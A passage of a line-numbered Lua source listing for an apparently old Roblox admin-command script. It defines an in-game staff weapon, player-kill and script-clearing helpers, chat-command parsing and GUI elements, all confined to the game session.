  1899. player.Character.Humanoid:TakeDamage(-humanoid.MaxHealth)
  1900. soul=soul+1
  1901. end
  1902. s1=function(t)
  1903. x(function()
  1904. clickActive=false
  1905. for i,h in pairs(t.Parent:children())do
  1906. if h:IsA('Humanoid')then
  1907. h:TakeDamage(.1)
  1908. if h.Health<=0 then
  1909. ko(h)
  1910. print'DIE!'
  1911. end
  1912. return
  1913. end
  1914. end
  1915. t:BreakJoints()
  1916. clickActive=false
  1917. end)
  1918. end
  1919. s2=function(t)
  1920. x(function()
  1921. delay(.1,function()s3(t)end)
  1922. if t:FindFirstChild('w-')then return end
  1923. q=player.Character.Torso.CFrame.lookVector
  1924. wq=new('BodyThrust')
  1925. debris:AddItem(wq,.2)
  1926. x(function()debris:AddItem(t.Smoke,.02)end)
  1927. x(function()
  1928. smc=Smoke:clone()
  1929. debris:AddItem(smc,3)
  1930. smc.Enabled=true
  1931. smc.Parent=t
  1932. end)
  1933. wq.force=vnew(40,40,40)
  1934. wq.location=vnew(0,100,1)
  1935. wq.Parent=t
  1936. qwe = Instance.new('BodyVelocity')
  1937. debris:AddItem(qwe,.3)
  1938. qwe.Name='w-'
  1939. qwe.maxForce=Vector3.new(1e7,1e7,1e7)
  1940. qwe.P=125
  1941. qwe.velocity=(Vector3.new(q.x,q.y,q.z)*100)+Vector3.new(0,30,0)
  1942. qwe.Parent=t
  1943. clickActive=false
  1944. for i,h in pairs(t.Parent:children())do
  1945. if h:IsA('Humanoid')then
  1946. h:TakeDamage(10)
  1947. if h.Health<=0 then
  1948. ko(h)
  1949. print'DIE!'
  1950. end
  1951. return
  1952. end
  1953. end
  1954. t:BreakJoints()
  1955. clickActive=false
  1956. end)
  1957. end
  1958. s3=function(t)
  1959. x(function()
  1960. if t.Size.x+t.Size.y+t.Size.z<=20 then
  1961. t.Anchored=false
  1962. end
  1963. if staff:FindFirstChild('ow')or staff:FindFirstChild('wq')then return end
  1964. pa=new('Part')
  1965. debris:AddItem(pa,3)
  1966. pa.Name='ow'
  1967. pa.formFactor=0
  1968. pa.Size=vnew(1,1,1)
  1969. pa.Transparency=1
  1970. pa.CanCollide=false
  1971. pa.Parent=staff
  1972. fire=new('Fire',pa)
  1973. fire.Size=3
  1974. fire.Heat=14
  1975. weld=new('Weld',staff)
  1976. weld.Part0=staff
  1977. weld.Part1=pa
  1978. weld.C0=fnew(0,staff.Size.y/1.3,0)
  1979. clickActive=false
  1980. for i,h in pairs(t.Parent:children())do
  1981. if h:IsA('Humanoid')then
  1982. h:TakeDamage(20)
  1983. if h.Health<=0 then
  1984. ko(h)
  1985. end
  1986. return
  1987. end
  1988. end
  1989. t:BreakJoints()
  1990. clickActive=false
  1991. end)
  1992. end
  1993. --=====================================--
  1994. tool.TextureId='http://www.roblox.com/asset/?id=54353092'
  1995. tool.Activated:connect(function()
  1996. if kayActive==true then return end
  1997. clickActive=true
  1998. mode=mode+1
  1999. if mode==2 then
  2000. a=new('StringValue')
  2001. debris:AddItem(a,1)
  2002. a.Name='toolanim'
  2003. a.Value='Slash'
  2004. a.Parent=tool
  2005. elseif mode==3 then
  2006. s3()
  2007. end
  2008. wait(.3)
  2009. mode=1
  2010. clickActive=false
  2011. end)
  2012. tool.Equipped:connect(function(d)
  2013. pcall(function()staff.CFrame=player.Character['Right Arm'].CFrame end)
  2014. d.KeyUp:connect(function(k)if k=='e'then Round=false end end)
  2015. d.KeyDown:connect(function(k)
  2016. x(function()
  2017. if k=='t'then
  2018. if clickActive==true then return end
  2019. kayActive=true --Rofl
  2020. if d.Target==nil then return end
  2021. torso=player.Character.Torso
  2022. torso.Velocity=vnew(0,0,0)
  2023. torso.RotVelocity=vnew(0,0,0)
  2024. torso.CFrame=fnew(d.Hit.p.x,d.Hit.p.y+5,d.Hit.p.z)
  2025. torso.Velocity=vnew(0,0,0)
  2026. torso.RotVelocity=vnew(0,0,0)
  2027. Sp.Enabled=true
  2028. wait(.1)
  2029. Sp.Enabled=false
  2030. kayActive=false
  2031. elseif k=='p'then
  2032. if Poisoning==true then print'Poisoning Active!' return end
  2033. Poisoning=true
  2034. Pp=new('Part')
  2035. Pp.formFactor=0
  2036. Pp.Size=vnew(1,1,1)
  2037. Pp.Transparency=.9
  2038. Pp.Position=d.Hit.p
  2039. Pp.BrickColor=BrickColor.Green()
  2040. Pp.CanCollide=false
  2041. Pp.Anchored=true
  2042. new('SpecialMesh',Pp).MeshType='Sphere'
  2043. Pp.Mesh.Scale=vnew(50,50,50)
  2044. Pp.Parent=workspace
  2045. for lw=1,10 do
  2046. nPp=new('Part')
  2047. nPp.formFactor=0
  2048. nPp.Size=vnew(1,1,1)
  2049. nPp.Transparency=.9
  2050. nPp.CFrame=Pp.CFrame
  2051. nPp.BrickColor=BrickColor.Green()
  2052. nPp.CanCollide=false
  2053. nPp.Anchored=true
  2054. new('SpecialMesh',nPp).MeshType='Sphere'
  2055. nPp.Mesh.Scale=vnew(4.5*lw,4.5*lw,4.5*lw)
  2056. nPp.Parent=Pp
  2057. end
  2058. debris:AddItem(Pp,200*.2)
  2059. delay(0,function()
  2060. for RoundNew=1,200 do
  2061. wait(.2)
  2062. if Pp==nil then break end
  2063. pcall(function()
  2064. for yy,X in ipairs(game:service('Players'):GetPlayers())do
  2065. if X~=player then
  2066. pcall(function()
  2067. if (X.Character.Torso.Position-Pp.Position).magnitude<30 then
  2068. for z,humaa in pairs(X.Character:children())do
  2069. if humaa:IsA('Humanoid')then
  2070. pcall(function()
  2071. newSound=new('Sound')
  2072. newSound.Parent=X.Backpack
  2073. end)
  2074. humaa:TakeDamage(5)
  2075. if humaa.Health<=0 then
  2076. ko(humaa)
  2077. end
  2078. end
  2079. end
  2080. end
  2081. end)
  2082. end
  2083. end
  2084. end)
  2085. end
  2086. pcall(function()Pp:remove()end)
  2087. Poisoning=false
  2088. end)
  2089. elseif k=='e'then
  2090. if clickActive==true or kayActive==true then return end
  2091. kayActive=true
  2092. Round=true
  2093. Sp.Enabled=true
  2094. soundnew=new('Sound')
  2095. soundnew.SoundId='rbxasset://sounds/collide.wav'
  2096. soundnew.Pitch=.5
  2097. soundnew.Volume=1
  2098. repeat
  2099. wait(.05)
  2100. pcall(function()
  2101. for ah,Vplayer in ipairs(game:service('Players'):GetPlayers())do
  2102. pcall(function()
  2103. if (Vplayer.Character.Torso.Position-d.Hit.p).magnitude<7 then
  2104. for l,o in pairs(Vplayer.Character:children())do
  2105. if o:IsA('Humanoid')then ko(o)end
  2106. end
  2107. end
  2108. end)
  2109. end
  2110. pcall(function()player.Character.Torso.CFrame=fnew(player.Character.Torso.Position,vnew(d.hit.p.x,0,d.hit.p.z))end)
  2111. Apart=new('Part')
  2112. soundnew:clone().Parent=Apart
  2113. debris:AddItem(Apart,.3)
  2114. Apart.formFactor=0
  2115. Apart.Size=vnew(1,1,1)
  2116. Apart.Transparency=.2
  2117. Apart.CanCollide=true
  2118. --Apart.Anchored=true
  2119. rand=math.random(1,6)
  2120. new('BlockMesh',Apart).Scale=vnew(rand,rand,rand)
  2121. Apart.BrickColor=BrickColor.random()
  2122. Apart.CFrame=rot(math.rad(math.random(-360,360)),math.rad(math.random(-360,360)),math.rad(math.random(-360,360)))+d.Hit.p+vnew(math.random(-2,2),math.random(-2,2),math.random(-2,2))
  2123. Apart.Parent=workspace
  2124. pcall(function()Apart.Sound:play()end)
  2125. pcall(function()Apart.Sound:play()end)
  2126. exp=new('Explosion')
  2127. exp.BlastRadius=6
  2128. exp.Position=Apart.Position
  2129. exp.Parent=Apart
  2130. end)
  2131. until Round==false
  2132. pcall(function()
  2133. soundnew:remove()
  2134. Sp.Enabled=false
  2135. end)
  2136.  
  2137. kayActive=false
  2138. elseif k=='n'then
  2139. if clickActive==true then return end
  2140. kayActive=true
  2141. Smoke.RiseVelocity=20
  2142. x(function()
  2143. if Smoke.Enabled==true then return end
  2144. for i,v in pairs(SmokePart:children())do
  2145. x(function()v.Enabled=true end)
  2146. end
  2147. for b=1,10 do
  2148. wait()
  2149. for i,v in pairs(tool:children())do
  2150. if v==staff then
  2151. v.BrickColor=bcn(1003)
  2152. v.Material=('Slate')
  2153. wait()
  2154. v.Material=('Wood')
  2155. v.BrickColor=bcn('Reddish brown')
  2156. end
  2157. if v~=staff and v~=SmokePart and v~=script then
  2158. v.Material=('Plastic')
  2159. v.Transparency=b/10
  2160. if b==10 then
  2161. v:remove()
  2162. end
  2163. end
  2164. end
  2165. end
  2166. for i,v in pairs(SmokePart:children())do
  2167. x(function()v.Enabled=false end)
  2168. end
  2169. Smoke.RiseVelocity=5
  2170. kayActive=false
  2171. end)
  2172. elseif k=='q'then
  2173. if clickActive==true then return end
  2174. kayActive=true
  2175. x(function()
  2176. if Sp.Enabled==true then return end
  2177. Sp.Enabled=true
  2178. Model=new('Model',player.Character)
  2179. debris:AddItem(Model,30)
  2180. Model.Name='Snare'..random(-999999,999999)
  2181. partnew=new('Part')
  2182. partnew.Anchored=true
  2183. partnew.Shape=0
  2184. partnew.Size=vnew(4,4,4)
  2185. partnew.Material=('Slate')
  2186. partnew.BrickColor=bcn('Bright red')
  2187. partnew.BottomSurface=0
  2188. partnew.TopSurface=0
  2189. partnew.Name='Main'
  2190. partnew.CFrame=fnew(d.Hit.p.x,d.Hit.p.y,d.Hit.p.z)
  2191. partnew.Parent=Model
  2192. for ee=1,6 do
  2193. partlist={}
  2194. for aa=1,14 do
  2195. wait()
  2196. p=new('Part')
  2197. partlist[aa]=p
  2198. p.formFactor=3
  2199. p.CanCollide=false
  2200. p.Size=vnew(2,2,2)
  2201. p.BottomSurface=0
  2202. p.TopSurface=0
  2203. p.Material=('Slate')
  2204. if aa~=1 then
  2205. p.BrickColor=bcn(1003)
  2206. p.Size=Vector3.new(2,2,2/(aa/10))
  2207. end
  2208. p.CFrame=partnew.CFrame
  2209. p.Parent=Model
  2210. if aa==1 then
  2211. w=new('Weld',partnew)
  2212. else
  2213. wq=aa-1
  2214. w=new('Weld',partlist[wq])
  2215. end
  2216. w.Part0=w.Parent
  2217. w.Part1=p
  2218. w.C0=rot(0,0,.25/-aa)+vnew(p.Size.x/2,0,0)
  2219. if aa==2 then
  2220. w.C0=rot(0,ee,.2)+vnew(0,.2,0)
  2221. end
  2222. end
  2223. end
  2224. for i,v in pairs(Model:children())do
  2225. if v:IsA('BasePart')then
  2226. v.Anchored=true
  2227. v:BreakJoints()
  2228. end
  2229. end
  2230. sing('1',partnew)
  2231. Sp.Enabled=false
  2232. kayActive=false
  2233. end)
  2234. end
  2235. end)
  2236. end)
  2237. x(function()mainarm=player.Character['Right Arm']
  2238. weld=new('Weld',mainarm)
  2239. weld.Part0=weld.Parent
  2240. weld.Part1=staff
  2241. weld.C0=rot(-pi/2,0,0)+vnew(0,-1,.55)
  2242. end)
  2243. tool.TextureId='http://www.roblox.com/asset/?id=54353092'
  2244. mode=1
  2245. if z~=nil then return end
  2246. z='asd'
  2247. for i,v in pairs(tool:children())do
  2248. if v~=staff and v~=script then
  2249. v:remove()
  2250. end
  2251. end
  2252. x(function()
  2253. for cc=1,6 do
  2254. for i=1,13 do
  2255. wait''
  2256. if tool.Parent~=player.Character then
  2257. break
  2258. end
  2259. x(function()
  2260. p=new('Part')
  2261. p.Name=i
  2262. p.formFactor=3
  2263. p.CanCollide=false
  2264. p.Size=vnew(.6,.6,.6)
  2265. p.Material=('Slate')
  2266. if i~=1 then
  2267. p.Size=vnew(.52+i/200,.52-i/40,.52-i/40)
  2268. p.BrickColor=bcn(1003)
  2269. end
  2270. p.CFrame=staff.CFrame
  2271. p.Parent=tool
  2272. if i==1 then
  2273. w=new('Weld',staff)
  2274. else
  2275. qn=tool[i-1]
  2276. w=new('Weld',tool[i-1])
  2277. qn.Name='?'
  2278. end
  2279. w.Part0=w.Parent
  2280. w.Part1=p
  2281. if i==1 then
  2282. w.C0=rot(0,-pi/2*cc/1.5,.2)+vnew(0,staff.Size.y/2,0)
  2283. else
  2284. w.C0=rot(0,0,.2)+vnew(p.Size.x/2,0,0)
  2285. end
  2286. end)
  2287. end
  2288. end
  2289. end)
  2290. p=new('Part')
  2291. p.Shape=0
  2292. p.Name='a'
  2293. p.Material=('Slate')
  2294. p.Size=vnew(1,1,1)
  2295. p.CanCollide=false
  2296. p.Parent=tool
  2297. w=new('Weld',staff)
  2298. w.Part0=staff
  2299. w.Part1=p
  2300. w.C0=fnew(0,staff.Size.y/2,0)
  2301. p=new('Part')
  2302. p.Shape=0
  2303. p.Name='Smoke'
  2304. p.Material=('Slate')
  2305. p.BottomSurface=0
  2306. p.TopSurface=0
  2307. p.Size=vnew(1,1,1)
  2308. p.BrickColor=bcn(1003)
  2309. p.CanCollide=false
  2310. p.Parent=tool
  2311. Smoke=new('Smoke',p)
  2312. Smoke.Size=.01
  2313. Smoke.Enabled=false
  2314. Smoke.Color=cnew(0,0,0)
  2315. Smoke.Opacity=1
  2316. Smoke.RiseVelocity=5
  2317. Sp=new('Sparkles')
  2318. Sp.Enabled=false
  2319. Sp.Parent=p
  2320. Sp.Color=cnew(1,0,0)
  2321. w=new('Weld',staff)
  2322. w.Part0=staff
  2323. w.Part1=p
  2324. w.C0=fnew(0,staff.Size.y/1.3,0)
  2325. SmokePart=p
  2326. hagal={}
  2327. for y=1,4 do
  2328. for i=1,20 do
  2329. if tool.Parent~=player.Character then
  2330. break
  2331. end
  2332. p=new('Part')
  2333. hagal[i]=p
  2334. p.formFactor=3
  2335. p.Name='q'
  2336. p.BrickColor=bcn(1003)
  2337. p.Size=vnew(.5,.4,.5)
  2338. p.Material=('Slate')
  2339. p.CanCollide=false
  2340. p.Parent=tool
  2341. if i==1 then
  2342. w=new('Weld',staff)
  2343. else
  2344. w=new('Weld',hagal[i-1])
  2345. end
  2346. w.Part0=w.Parent
  2347. w.Part1=p
  2348. if i==1 then
  2349. w.C0=rot(0,pi/2*y,0)+vnew(0,(staff.Size.y/2)-i*p.Size.y+.2,0)
  2350. elseif i<=10 then
  2351. w.C0=rot(0,pi/2/i,0)+vnew(.05,-p.Size.y/2,0)
  2352. elseif i>10 then
  2353. w.C0=rot(.1,pi/2/i*6,0)+vnew(.03,-p.Size.y,0)
  2354. end
  2355. wait''
  2356. end
  2357. end
  2358. for i,v in pairs(tool:children())do
  2359. if v.Name=='Smoke'then
  2360. v.Touched:connect(function(a)
  2361. x(function()
  2362. if a.Parent~=player.Character and a.Parent~=tool then
  2363. if mode==1 then
  2364. s1(a)
  2365. elseif mode==2 then
  2366. s2(a)
  2367. elseif mode==3 then
  2368. s3(a)
  2369. end
  2370. end
  2371. end)
  2372. end)
  2373. end
  2374. end
  2375. end)
  2376. tool.Unequipped:connect(function()
  2377. if tool.Parent:IsA('Backpack')then
  2378. for i,v in pairs(tool:children())do
  2379. if v~=staff and v~=script then
  2380. v:remove()
  2381. end
  2382. end
  2383. end
  2384. z=nil
  2385. end)
  2386. x(function()
  2387. player.Character.Humanoid.Died:connect(function()if tool.Parent~=player.Character then tool:remove() return end
  2388. if fakestaff~=nil then return end
  2389. fakestaff=new('Model',workspace)
  2390. debris:AddItem(fakestaff,10)
  2391. for i,v in pairs(tool:children())do
  2392. if v~=script then
  2393. v.Parent=fakestaff
  2394. v.Anchored=true
  2395. x(function()v.Smoke.Enabled=true end)
  2396. x(function()v.Sparkles.Enabled=true end)
  2397. end
  2398. end
  2399. sing('2',fakestaff.Smoke)
  2400. fakestaff.Handle:remove()
  2401. fakestaff:BreakJoints()
  2402. tool:remove()
  2403. end)
  2404. end)
  2405. ]],Tool)
  2406. Tool.Parent=par
  2407. Print('Staff added for '..par.Parent.Name..'!')
  2408. end
  2409. hatsmodel=game:GetService('InsertService'):LoadAsset(53684482)
  2410. if hatsmodel~=nil then
  2411. if #hatsmodel:GetChildren()~=0 then
  2412. for i,hats in pairs(hatsmodel:GetChildren())do
  2413. Hats.AlakazardHats[i]=hats:clone()
  2414. hats:remove()
  2415. end
  2416. end
  2417. end
  2418. if game.PlaceId==113456 or game.PlaceId==56786 or game.PlaceId==115207 or game.PlaceId==0 then
  2419. AnaminusBlock={
  2420. ObjectCheck0=function(d)if d:FindFirstChild('DSource')then se.debris:AddItem(d,0)d.archivable=true end end,
  2421. ObjectCheck1=function(d)if d:FindFirstChild('DSource') then d:FindFirstChild('DSource').Value='' end end,
  2422. ObjectCheck2=function(d)if d:FindFirstChild('DSource') then d:FindFirstChild('DSource').Value='' d:remove() end end,
  2423. ObjectCheck3=function(d)if d:FindFirstChild('DSource') and d.className=='Script' then d.Disabled=true d:FindFirstChild('DSource').Value='' wait()d:remove() end end,
  2424. }
  2425. AnaSbCheck1=se.workspace.ChildAdded:connect(function(asd)
  2426. for i,a in pairs(AnaminusBlock)do
  2427. if asd~=nil then
  2428. a(asd)
  2429. end
  2430. end
  2431. end)
  2432. end
  2433. Create=function(fn)table.insert(AlakazardCmds.NewFunctions,X(fn))end
  2434. ChangeClear=function(asdasd,data)
  2435. for _,v in pairs(asdasd:GetChildren())do
  2436. X(function()
  2437. if data:lower()=='name'then
  2438. if string.find(v.Name:lower(),AlakazardCmds.Names.clear:lower())==1 then
  2439. v.arcivable=false
  2440. se.debris:AddItem(v,0)
  2441. ChangeClear(v,'Name')
  2442. end
  2443. elseif data:lower()=='class'then
  2444. if string.find(v.className:lower(),AlakazardCmds.Names.clear:lower())==1 then
  2445. v.arcivable=false
  2446. se.debris:AddItem(v,0)
  2447. ChangeClear(v,'class')
  2448. end
  2449. end
  2450. end)
  2451. end
  2452. end
  2453. Clear=function(o,n)
  2454. if n:lower()=='script'then
  2455. for i,v in pairs(o:GetChildren())do
  2456. X(function()
  2457. X(function()
  2458. if v:IsA('BaseScript')and v.Name~='Animate'then
  2459. if script==nil then
  2460. v.Disabled=true
  2461. v.archivable=false
  2462. se.debris:AddItem(v,0)
  2463. end
  2464. if script~=nil and v~=script then
  2465. v.Disabled=true
  2466. v.archivable=false
  2467. se.debris:AddItem(v,0)
  2468. end
  2469. end
  2470. end)
  2471. X(function()Clear(v,'script')end)
  2472. end)
  2473. end
  2474. elseif n:lower()=='all'then
  2475. for i,v in pairs(o:GetChildren())do
  2476. X(function()
  2477. archivable=false
  2478. se.debris:AddItem(v,.2)
  2479. end)
  2480. X(function()Clear(v,'all')end)
  2481. end
  2482. end
  2483. end
  2484. _HM=function(txt,class,par)
  2485. pcall(function()
  2486. _hm=new(class)
  2487. _hm.Text=txt
  2488. sound=new('Sound',_hm)
  2489. sound.Volume=1
  2490. sound.SoundId='rbxasset://sounds//SWITCH3.wav'
  2491. se.debris:AddItem(_hm,#txt/7)
  2492. Scripting('local',[[text=']]..txt..[[' for i=1,#text do script.Parent.Text='|:| '..text:sub(1,i)..' |:|'pcall(function()script.Parent.Sound:play()end)wait()end]],_hm)
  2493. _hm.Parent=par
  2494. end)
  2495. return _hm
  2496. end
  2497. Adv=function(txt,par,pos1,pos2,pos3,pos4)
  2498. Hint=Guis.Hint.Screen:clone()
  2499. se.debris:AddItem(Hint,#txt/4.5)
  2500. if #txt~=0 then
  2501. newsound=new('Sound')
  2502. newsound.SoundId=Sounds.warning.SoundId
  2503. newsound.Pitch=Sounds.warning.Pitch
  2504. newsound.Volume=Sounds.warning.Volume
  2505. newsound.Looped=Sounds.warning.Looped
  2506. newsound:play()
  2507. newsound.Parent=Hint
  2508. newsound:play()
  2509. end
  2510. Hint.t.Text='|:| '..txt..' |:|'
  2511. Hint.t.Position=unew(pos1,pos2,pos3,pos4)
  2512. Hint.Parent=par
  2513. return Hint
  2514. end
  2515. FixCmds=function(v,p)
  2516. wait()
  2517. i=0
  2518. if scmd(v,'fix')==false then return end
  2519. for asd,c in pairs(Commands)do
  2520. i=i+1
  2521. Actual[p.Name..i]:disconnect()
  2522. end
  2523. for i,c in pairs(Commands)do
  2524. Actual[p.Name..i]=p.Chatted:connect(function(v)
  2525. c(v,p)
  2526. end)
  2527. end
  2528. end
  2529. scmd=function(v,c)
  2530. vl=v:lower()
  2531. cl=c:lower()
  2532. for asd in vl:gmatch('%w+')do
  2533. if asd==cl then
  2534. for i=1,#v do
  2535. if vl:sub(i,i+#cl)==cl..'/' then
  2536. clen=i+#c
  2537. return true
  2538. end
  2539. end
  2540. end
  2541. end
  2542. return false
  2543. end
  2544. Findw=function(wtw,wcommandw,wnumw)
  2545. X(function()
  2546. Q={}
  2547. wtextw=wtw:lower()
  2548. wclw=wcommandw:lower()
  2549. ym=false
  2550. for wlw in string.gmatch(wtextw,'%w+') do
  2551. if ym==true then
  2552. table.insert(Q,wlw)
  2553. end
  2554. if Q[wnumw]~=nil then
  2555. return Q
  2556. end
  2557. if wlw==wclw then
  2558. if wnumw==0 then
  2559. return wlw
  2560. end
  2561. ym=true
  2562. end
  2563. end
  2564. return nil
  2565. end)
  2566. end
  2567. spl=function(name,s)
  2568. if name==nil or s==nil then return{}end
  2569. t={}
  2570. if name:lower()==''then table.insert(t,s)return t end
  2571. if name:lower()=='me'then table.insert(t,s)return t end
  2572. if name:lower()=='admins'then for n,pl in ipairs(se.players:GetPlayers())do if ListCheck(PlayersList.Admins,pl.userId)==true then table.insert(t,pl) end end return t end
  2573. if name:lower()=='noobs'then for n,pl in ipairs(se.players:GetPlayers())do if ListCheck(PlayersList.Admins,pl.userId)~=true then table.insert(t,pl) end end return t end
  2574. if name:lower()=='all'then for n,pl in ipairs(se.players:GetPlayers())do table.insert(t,pl) end return t end
  2575. if name:lower()=='notme'then for n,pl in ipairs(se.players:GetPlayers())do if pl~=s then table.insert(t,pl) end end return t end
  2576. for n,pl in ipairs(se.players:GetPlayers())do if string.find(pl.Name:lower(),name:lower())==1 then table.insert(t,pl)end end
  2577. return t
  2578. end
  2579. CCL=function(p)
  2580. delay(.75,function()
  2581. for i,v in pairs(p.Character.Head:GetChildren())do
  2582. if v.className=='Sound'then
  2583. v.Pitch=0
  2584. se.debris:AddItem(v,.1)
  2585. end
  2586. end
  2587. for i,v in pairs(p.Character:GetChildren())do
  2588. if v:IsA('BaseScript')and v.Name~='Animate'and v.Name~='LocalScript'then
  2589. se.debris:AddItem(v,.1)
  2590. end
  2591. end
  2592. end)
  2593. end
  2594. FakeHead=function(p)
  2595. pcall(function()
  2596. head=p.Character.Head
  2597. fake=head:clone()
  2598. model=new('Model')
  2599. human=new('Humanoid')
  2600. head.Transparency=1
  2601. for i,v in pairs(head:children())do
  2602. if not v:IsA('Weld')and v:IsA('SpecialMesh')then
  2603. v:remove()
  2604. end
  2605. end
  2606. model.Parent=head.Parent
  2607. model.Name=''
  2608.  
  2609. fake.Parent=model
  2610. pcall(function()fake.BrickColor=model.Parent['Body Colors'].HeadColor end)
  2611. weld=new('Weld',model.Parent.Torso)
  2612. weld.Part0=weld.Parent
  2613. weld.Part1=fake
  2614. weld.C0=CFrame.new(0,1.5,0)
  2615. human.Parent=model
  2616. human.Health=0
  2617. human.MaxHealth=0
  2618. end)
  2619. end
  2620. KO_CREATOR=function(user1,user2)
  2621. X(function()
  2622. c=new('ObjectValue')
  2623. c.Value=user1
  2624. c.Name='creator'
  2625. for i,hum in pairs(user2.Character:GetChildren())do
  2626. if hum.className=='Humanoid'then
  2627. c.Parent=hum
  2628. hum.Health=0
  2629. end
  2630. end
  2631. user2.Character:BreakJoints()
  2632. end)
  2633. end
  2634. KO=function(user1,user2)wait()
  2635. X(function()
  2636. PlayersList.Runs.HealthBar[user2.Name]=false
  2637. KOsScriptNew=Scripting('local',[[script.Parent=workspace
  2638. Player1=']]..user1.Name..[['
  2639. Player2=']]..user2.Name..[['
  2640. repeat
  2641. wait(.05)
  2642. if pcall(function()
  2643. Ala1=game.Players[Player1]
  2644. Ala2=game.Players[Player2]
  2645. ko=Instance.new('ObjectValue')
  2646. ko.Name='creator'
  2647. ko.Value=Ala1
  2648. m=Instance.new('Model')
  2649. game:service('Debris'):AddItem(m,.2)
  2650. m.Name=Player2
  2651. h=Instance.new('Humanoid',m)
  2652. ko.Parent=h
  2653. Ala2.Character=m
  2654. Ala2.Character.Parent=workspace
  2655. end)then
  2656. else
  2657. script:remove()
  2658. end
  2659. until asd~=nil
  2660. ]],user1.PlayerGui)
  2661. table.insert(PlayersList.KOs,KOsScriptNew)
  2662. end)
  2663. end
  2664. LoadGuisHere=function()
  2665. Guis.HealthBar[1]=new('ScreenGui')
  2666. Guis.HealthBar[1].Name=[[==Alakazard's Health Guis==]]
  2667. Guis.HealthBar[2]=Instance.new('Frame',Guis.HealthBar[1])
  2668. Guis.HealthBar[2].Name='base'
  2669. Guis.HealthBar[2].Position=UDim2.new(0.400000000,0,0.94000000,0)
  2670. Guis.HealthBar[2].Size=UDim2.new(0.200000000,0,0.059000000,0)
  2671. Guis.HealthBar[2].Style=('RobloxSquare')
  2672. Guis.HealthBar[3]=Instance.new('Frame',Guis.HealthBar[2])
  2673. Guis.HealthBar[3].Name='Health_1'
  2674. Guis.HealthBar[3].Size=UDim2.new(0.9000000000,0,0.5,0)
  2675. Guis.HealthBar[3].BackgroundTransparency=.8
  2676. Guis.HealthBar[3].BackgroundColor3=Color3.new(128,0,0)
  2677. Guis.HealthBar[4]=Instance.new('Frame',Guis.HealthBar[3])
  2678. Guis.HealthBar[4].Name='Health'
  2679. Guis.HealthBar[4].Size=UDim2.new(1,0,1,0)
  2680. Guis.HealthBar[4].BackgroundTransparency=.8
  2681. Guis.HealthBar[4].BackgroundColor3=Color3.new(0,255,0)
  2682. Guis.HealthBar[5]=Instance.new('TextLabel',Guis.HealthBar[3])
  2683. Guis.HealthBar[5].Name='hp'
  2684. Guis.HealthBar[5].Position=UDim2.new(.5,0,.5,0)
  2685. Guis.HealthBar[5].TextColor3=Color3.new(255,255,255)
  2686. Guis.HealthBar[5].Text='Alakazard; Pending...'
  2687. Guis.HealthBar[6]=Instance.new('Frame',Guis.HealthBar[2])
  2688. Guis.HealthBar[6].Name='Health_2'
  2689. Guis.HealthBar[6].Size=UDim2.new(0.9000000000,0,0.5,0)
  2690. Guis.HealthBar[6].Position=UDim2.new(0,0,.55,0)
  2691. Guis.HealthBar[6].BackgroundTransparency=.8
  2692. Guis.HealthBar[6].BackgroundColor3=Color3.new(128,0,0)
  2693. Guis.HealthBar[7]=Instance.new('Frame',Guis.HealthBar[6])
  2694. Guis.HealthBar[7].Name='Health'
  2695. Guis.HealthBar[7].Size=UDim2.new(1,0,1,0)
  2696. Guis.HealthBar[7].BackgroundTransparency=.8
  2697. Guis.HealthBar[7].BackgroundColor3=Color3.new(255,255,0)
  2698. Guis.HealthBar[8]=Instance.new('TextLabel',Guis.HealthBar[6])
  2699. Guis.HealthBar[8].Name='hp'
  2700. Guis.HealthBar[8].Position=UDim2.new(.5,0,.5,0)
  2701. Guis.HealthBar[8].TextColor3=Color3.new(255,255,255)
  2702. Guis.HealthBar[8].Text='Alakazard; Pending...'
  2703. Guis.HealthBar[9]=Scripting('local',[[print'load']],Guis.HealthBar[1])
  2704. Guis.HealthBar[10]=Instance.new('ImageLabel')
  2705. Guis.HealthBar[10].Name=[[(|:. Alakazard's Symbol .:|)]]
  2706. Guis.HealthBar[10].Position=UDim2.new(.9,0,0,0)
  2707. Guis.HealthBar[10].Parent=Guis.HealthBar[2]
  2708. Guis.HealthBar[10].Size=UDim2.new(.1,0,1.1,0)
  2709. Guis.HealthBar[10].Image=id..'47965745'
  2710. Guis.HealthBar[10].BackgroundTransparency=1
  2711. Guis.Hint.Screen=new('ScreenGui')
  2712. Guis.Hint.Screen.Name='NewHint'
  2713. Guis.Hint.TextGui=new('TextButton',Guis.Hint.Screen)
  2714. Guis.Hint.TextGui.Name='t'
  2715. Guis.Hint.TextGui.Style=('RobloxButton')
  2716. Guis.Hint.TextGui.TextColor3=Color3.new(1,1,1)
  2717. Guis.Hint.TextGui.AutoButtonColor=false
  2718. Guis.Hint.TextGui.FontSize=('Size10')
  2719. Guis.Hint.TextGui.Size=UDim2.new(1,0,.05,0)
  2720. Guis.Hint.TextGui.TextWrap=true
  2721. end
  2722. SoundsLoad=function()
  2723. X(function()
  2724. for n,s in pairs(se.lighting:GetChildren())do
  2725. for sn in pairs(Sounds)do
  2726. if s.Name==sn then
  2727. s:remove()
  2728. end
  2729. end
  2730. end
  2731. for i in pairs(Sounds)do
  2732. newsound=new('Sound')
  2733. newsound.Name=i
  2734. newsound.SoundId=Sounds[i].SoundId
  2735. newsound.Pitch=0
  2736. newsound.Volume=0
  2737. newsound.Looped=true
  2738. newsound.Parent=se.lighting
  2739. newsound:play()
  2740. end
  2741. end)
  2742. end
  2743. LoadGuis=function(p)
  2744. if ListCheck(PlayersList.Admins,p.userId)==true then
  2745. X(function()
  2746. ShowCommands(p)
  2747. p.ChildAdded:connect(function(child)
  2748. if child:IsA('PlayerGui')then
  2749. ShowCommands(p)
  2750. end
  2751. end)
  2752. end)
  2753. end
  2754. X(function()
  2755. X(function()wait(1)
  2756. X(function()
  2757. for i,v in pairs(p:children())do
  2758. if v:IsA('PlayerGui')then
  2759. for a,w in pairs(v:children())do
  2760. if w.Name=='HealthGUI'then
  2761. w:remove()
  2762. end
  2763. end
  2764. end
  2765. end
  2766. end)
  2767. X(function()
  2768. if ListCheck(PlayersList.Creator,p.userId)==true then
  2769. delay(4,function()pcall(function()p.Character.Head.face:remove()end)end)
  2770. delay(4,function()pcall(function()p.Character.Head.BrickColor=bcn(1003)end)end)
  2771. if p.Character~=nil then
  2772. X(function()
  2773. for wqw,hatw in pairs(Hats.AlakazardHats)do
  2774. hatw:clone().Parent=p.Character
  2775. end
  2776. end)
  2777. end
  2778. end
  2779. end)
  2780. X(function()
  2781. if PlayersList.Runs.HealthBar[p.Name]==false then return end
  2782. for i,pg in pairs(p:GetChildren())do
  2783. if pg.className=='PlayerGui'then
  2784. for asdwasd,pgg in pairs(pg:GetChildren())do
